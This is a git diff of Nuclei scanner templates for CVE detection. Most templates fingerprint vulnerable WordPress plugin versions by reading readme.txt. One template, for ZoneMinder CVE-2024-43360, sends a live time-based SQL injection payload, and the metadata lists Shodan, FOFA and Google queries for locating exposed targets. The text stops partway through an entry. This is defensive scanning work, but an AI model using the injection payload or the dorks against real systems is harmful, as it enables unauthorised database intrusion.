https://www.wordfence.com/threat-intel/vulnerabilities/id/1bee1eeb-5354-47c9-9ae1-b1608d87d7bb?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-10080 + metadata: + fofa-query: "wp-content/plugins/easy-post-types/" + google-query: inurl:"/wp-content/plugins/easy-post-types/" + shodan-query: 'vuln:CVE-2024-10080' + tags: cve,wordpress,wp-plugin,easy-post-types,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/easy-post-types/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "easy-post-types" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43360.yaml b/poc/cve/CVE-2024-43360.yaml new file mode 100644 index 0000000000..a8a0f98a75 --- /dev/null +++ b/poc/cve/CVE-2024-43360.yaml @@ -0,0 +1,31 @@ +id: CVE-2024-43360 + +info: + name: ZoneMinder time based sql injection detection + author: securitytaters + severity: Critical + description: | + Zoneminder v1.36.33 and v1.37.43 are affected by a SQL Injection vulnerability. + reference: + - http:// + tags: cve2024,cve,zoneminder,sqli + +variables: + username: '' + +http: + - raw: + - | + @timeout: 20s + GET /index.php?limit=20&mid=(select*from(select(sleep(14)))a)&order=desc&request=watch&sort=Id&view=request HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'duration>=14' + - 'status_code == 200' + - 'contains_all(body,"{\"result\":\"Ok\",\"rows\":[")' + - 'contains_all(content_type,"application/json")' + condition: and diff --git a/poc/cve/CVE-2024-48020.yaml b/poc/cve/CVE-2024-48020.yaml new file mode 100644 index 0000000000..727574a5ae --- /dev/null +++ b/poc/cve/CVE-2024-48020.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-48020 + +info: + name: > + Backup and Staging by WP Time Capsule <= 1.22.21 - Authenticated (Contributor+) SQL Injection + author: topscoder + severity: low + description: > + The Backup and Staging by WP Time Capsule plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 1.22.21 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/912523ae-f619-46af-83b9-e9fca81bd5b0?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.5 + cve-id: CVE-2024-48020 + metadata: + fofa-query: "wp-content/plugins/wp-time-capsule/" + google-query: inurl:"/wp-content/plugins/wp-time-capsule/" + shodan-query: 'vuln:CVE-2024-48020' + tags: cve,wordpress,wp-plugin,wp-time-capsule,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-time-capsule/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-time-capsule" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.22.21') \ No newline at end of file diff --git a/poc/cve/CVE-2024-48021.yaml b/poc/cve/CVE-2024-48021.yaml new file mode 100644 index 0000000000..3b454adb59 --- /dev/null +++ b/poc/cve/CVE-2024-48021.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-48021 + +info: + name: > + Contact Form 7 – PayPal & Stripe Add-on <= 2.3 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Contact Form 7 – PayPal & Stripe Add-on plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 2.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/25a9fd76-15aa-43f9-bb11-9825b847a4e3?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-48021 + metadata: + fofa-query: "wp-content/plugins/contact-form-7-paypal-add-on/" + google-query: inurl:"/wp-content/plugins/contact-form-7-paypal-add-on/" + shodan-query: 'vuln:CVE-2024-48021' + tags: cve,wordpress,wp-plugin,contact-form-7-paypal-add-on,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/contact-form-7-paypal-add-on/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "contact-form-7-paypal-add-on" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-48022.yaml b/poc/cve/CVE-2024-48022.yaml new file mode 100644 index 0000000000..c339345a2a --- /dev/null +++ b/poc/cve/CVE-2024-48022.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-48022 + +info: + name: > + Shortcode For Elementor Templates <= 1.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Shortcode For Elementor Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d5a3b416-4434-456e-91c7-24f874e8f959?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-48022 + metadata: + fofa-query: "wp-content/plugins/shortcode-support-for-elementor-templates/" + google-query: inurl:"/wp-content/plugins/shortcode-support-for-elementor-templates/" + shodan-query: 'vuln:CVE-2024-48022' + tags: cve,wordpress,wp-plugin,shortcode-support-for-elementor-templates,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/shortcode-support-for-elementor-templates/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "shortcode-support-for-elementor-templates" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-48023.yaml b/poc/cve/CVE-2024-48023.yaml new file mode 100644 index 0000000000..f9cdc46570 --- /dev/null +++ b/poc/cve/CVE-2024-48023.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-48023 + +info: + name: > + Restaurant Reservations Widget <= 1.0 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Restaurant Reservations Widget plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e08c0e74-4ce0-4278-8f58-909f7c24f346?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-48023 + metadata: + fofa-query: "wp-content/plugins/restaurantconnect-reswidget/" + google-query: inurl:"/wp-content/plugins/restaurantconnect-reswidget/" + shodan-query: 'vuln:CVE-2024-48023' + tags: cve,wordpress,wp-plugin,restaurantconnect-reswidget,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/restaurantconnect-reswidget/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "restaurantconnect-reswidget" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-48024.yaml b/poc/cve/CVE-2024-48024.yaml new file mode 100644 index 0000000000..0efe645d03 --- /dev/null +++ b/poc/cve/CVE-2024-48024.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-48024 + +info: + name: > + Keep Backup Daily <= 2.0.7 - Unauthenticated Information Disclosure + author: topscoder + severity: medium + description: > + The Keep Backup Daily plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.0.7. This makes it possible for unauthenticated attackers to extract sensitive user or configuration data. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8b007bf9-9756-4f18-81b9-7d4b15c5dca8?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-48024 + metadata: + fofa-query: "wp-content/plugins/keep-backup-daily/" + google-query: inurl:"/wp-content/plugins/keep-backup-daily/" + shodan-query: 'vuln:CVE-2024-48024' + tags: cve,wordpress,wp-plugin,keep-backup-daily,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/keep-backup-daily/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "keep-backup-daily" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.7') \ No newline at end of file diff --git a/poc/cve/CVE-2024-48025.yaml b/poc/cve/CVE-2024-48025.yaml new file mode 100644 index 0000000000..49d6a3dacc --- /dev/null +++ b/poc/cve/CVE-2024-48025.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-48025 + +info: + name: > + Simple Baseball Scoreboard <= 1.3 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Simple Baseball Scoreboard plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0519d77a-2fbd-48d5-bc2b-9efb84f9e559?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-48025 + metadata: + fofa-query: "wp-content/plugins/simple-baseball-scoreboard/" + google-query: inurl:"/wp-content/plugins/simple-baseball-scoreboard/" + shodan-query: 'vuln:CVE-2024-48025' + tags: cve,wordpress,wp-plugin,simple-baseball-scoreboard,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/simple-baseball-scoreboard/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "simple-baseball-scoreboard" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-48026.yaml b/poc/cve/CVE-2024-48026.yaml new file mode 100644 index 0000000000..544eb4a12f --- /dev/null +++ b/poc/cve/CVE-2024-48026.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-48026 + +info: + name: > + Disc Golf Manager <= 1.0.0 - Unauthenticated PHP Object Injection + author: topscoder + severity: critical + description: > + The Disc Golf Manager plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 1.0.0 via deserialization of untrusted input. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/cf85ddc7-cb90-4502-9936-f2c51030b4a6?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-48026 + metadata: + fofa-query: "wp-content/plugins/disc-golf-manager/" + google-query: inurl:"/wp-content/plugins/disc-golf-manager/" + shodan-query: 'vuln:CVE-2024-48026' + tags: cve,wordpress,wp-plugin,disc-golf-manager,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/disc-golf-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "disc-golf-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-48027.yaml b/poc/cve/CVE-2024-48027.yaml new file mode 100644 index 0000000000..e99ba97db8 --- /dev/null +++ b/poc/cve/CVE-2024-48027.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-48027 + +info: + name: > + External featured image from bing <= 1.0.2 - Authenticated (Subscriber+) Remote Code Execution + author: topscoder + severity: low + description: > + The External featured image from bing plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.0.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute code on the server. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/22d5a45b-41bd-4f65-b8b7-d7efb2b9cecf?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-48027 + metadata: + fofa-query: "wp-content/plugins/external-featured-image-from-bing/" + google-query: inurl:"/wp-content/plugins/external-featured-image-from-bing/" + shodan-query: 'vuln:CVE-2024-48027' + tags: cve,wordpress,wp-plugin,external-featured-image-from-bing,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/external-featured-image-from-bing/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "external-featured-image-from-bing" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-48028.yaml b/poc/cve/CVE-2024-48028.yaml new file mode 100644 index 0000000000..f46b8fa2cc --- /dev/null +++ b/poc/cve/CVE-2024-48028.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-48028 + +info: + name: > + IP Loc8 <= 1.1 - Unauthenticated PHP Object Injection + author: topscoder + severity: critical + description: > + The IP Loc8 plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 1.1 via deserialization of untrusted input. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/24092cd1-cf89-49c1-a607-4d5d06d0c804?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-48028 + metadata: + fofa-query: "wp-content/plugins/ip-loc8/" + google-query: inurl:"/wp-content/plugins/ip-loc8/" + shodan-query: 'vuln:CVE-2024-48028' + tags: cve,wordpress,wp-plugin,ip-loc8,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ip-loc8/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ip-loc8" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-48029.yaml b/poc/cve/CVE-2024-48029.yaml new file mode 100644 index 0000000000..3d0e05a8d8 --- /dev/null +++ b/poc/cve/CVE-2024-48029.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-48029 + +info: + name: > + SB Random Posts Widget <= 1.0 - Authenticated (Contributor+) Local File Inclusion + author: topscoder + severity: low + description: > + The SB Random Posts Widget plugin for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 1.0. This makes it possible for authenticated attackers, with contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d6fbf684-8651-484d-9459-ed11d6d9008f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-48029 + metadata: + fofa-query: "wp-content/plugins/sb-random-posts-widget/" + google-query: inurl:"/wp-content/plugins/sb-random-posts-widget/" + shodan-query: 'vuln:CVE-2024-48029' + tags: cve,wordpress,wp-plugin,sb-random-posts-widget,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/sb-random-posts-widget/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "sb-random-posts-widget" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-48030.yaml b/poc/cve/CVE-2024-48030.yaml new file mode 100644 index 0000000000..3b95831502 --- /dev/null +++ b/poc/cve/CVE-2024-48030.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-48030 + +info: + name: > + Telecash Ricaricaweb <= 2.2 - Unauthenticated PHP Object Injection + author: topscoder + severity: critical + description: > + The Telecash Ricaricaweb plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 2.2 via deserialization of untrusted input. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d0fa6998-b85a-413e-be00-81926b4ea6ab?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-48030 + metadata: + fofa-query: "wp-content/plugins/telecash-ricaricaweb/" + google-query: inurl:"/wp-content/plugins/telecash-ricaricaweb/" + shodan-query: 'vuln:CVE-2024-48030' + tags: cve,wordpress,wp-plugin,telecash-ricaricaweb,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/telecash-ricaricaweb/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "telecash-ricaricaweb" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-48031.yaml b/poc/cve/CVE-2024-48031.yaml new file mode 100644 index 0000000000..d206c538a9 --- /dev/null +++ b/poc/cve/CVE-2024-48031.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-48031 + +info: + name: > + Featured Posts with Multiple Custom Groups (FPMCG) <= 4.0 - Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + The Featured Posts with Multiple Custom Groups (FPMCG) plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.0. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to perform an unauthorized action via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/05ebdcca-ef90-4bbd-ac5e-05f57bf0c7d7?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-48031 + metadata: + fofa-query: "wp-content/plugins/featured-posts-with-multiple-custom-groups-fpmcg/" + google-query: inurl:"/wp-content/plugins/featured-posts-with-multiple-custom-groups-fpmcg/" + shodan-query: 'vuln:CVE-2024-48031' + tags: cve,wordpress,wp-plugin,featured-posts-with-multiple-custom-groups-fpmcg,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/featured-posts-with-multiple-custom-groups-fpmcg/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "featured-posts-with-multiple-custom-groups-fpmcg" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-48032.yaml b/poc/cve/CVE-2024-48032.yaml new file mode 100644 index 0000000000..fe8c071867 --- /dev/null +++ b/poc/cve/CVE-2024-48032.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-48032 + +info: + name: > + Featured Posts with Multiple Custom Groups (FPMCG) <= 4.0 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Featured Posts with Multiple Custom Groups (FPMCG) plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 4.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/bc6fce33-af42-466e-8e76-1e027d5d52ec?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-48032 + metadata: + fofa-query: "wp-content/plugins/featured-posts-with-multiple-custom-groups-fpmcg/" + google-query: inurl:"/wp-content/plugins/featured-posts-with-multiple-custom-groups-fpmcg/" + shodan-query: 'vuln:CVE-2024-48032' + tags: cve,wordpress,wp-plugin,featured-posts-with-multiple-custom-groups-fpmcg,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/featured-posts-with-multiple-custom-groups-fpmcg/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "featured-posts-with-multiple-custom-groups-fpmcg" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-48033.yaml b/poc/cve/CVE-2024-48033.yaml new file mode 100644 index 0000000000..32b12d73f4 --- /dev/null +++ b/poc/cve/CVE-2024-48033.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-48033 + +info: + name: > + Talkback <= 1.0 - Unauthenticated PHP Object Injection + author: topscoder + severity: critical + description: > + The Talkback plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 1.0 via deserialization of untrusted input. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/94fdc98a-c8be-47b4-a0a2-02d7373ab85e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-48033 + metadata: + fofa-query: "wp-content/plugins/talkback-secure-linkback-protocol/" + google-query: inurl:"/wp-content/plugins/talkback-secure-linkback-protocol/" + shodan-query: 'vuln:CVE-2024-48033' + tags: cve,wordpress,wp-plugin,talkback-secure-linkback-protocol,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/talkback-secure-linkback-protocol/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "talkback-secure-linkback-protocol" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-48034.yaml b/poc/cve/CVE-2024-48034.yaml new file mode 100644 index 0000000000..29b2350098 --- /dev/null +++ b/poc/cve/CVE-2024-48034.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-48034 + +info: + name: > + Creates 3D Flipbook, PDF Flipbook <= 1.2 - Authenticated (Subscriber+) Arbitrary File Upload + author: topscoder + severity: low + description: > + The Creates 3D Flipbook, PDF Flipbook in WordPress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 1.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5b5c8733-7396-4ae5-862d-15db370dbdd7?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-48034 + metadata: + fofa-query: "wp-content/plugins/create-flipbook-from-pdf/" + google-query: inurl:"/wp-content/plugins/create-flipbook-from-pdf/" + shodan-query: 'vuln:CVE-2024-48034' + tags: cve,wordpress,wp-plugin,create-flipbook-from-pdf,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/create-flipbook-from-pdf/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "create-flipbook-from-pdf" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-48035.yaml b/poc/cve/CVE-2024-48035.yaml new file mode 100644 index 0000000000..dd78766f55 --- /dev/null +++ b/poc/cve/CVE-2024-48035.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-48035 + +info: + name: > + ACF Images Search And Insert <= 1.1.4 - Authenticated (Subscriber+) Arbitrary File Upload + author: topscoder + severity: low + description: > + The ACF Images Search And Insert plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 1.1.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. + reference: + - 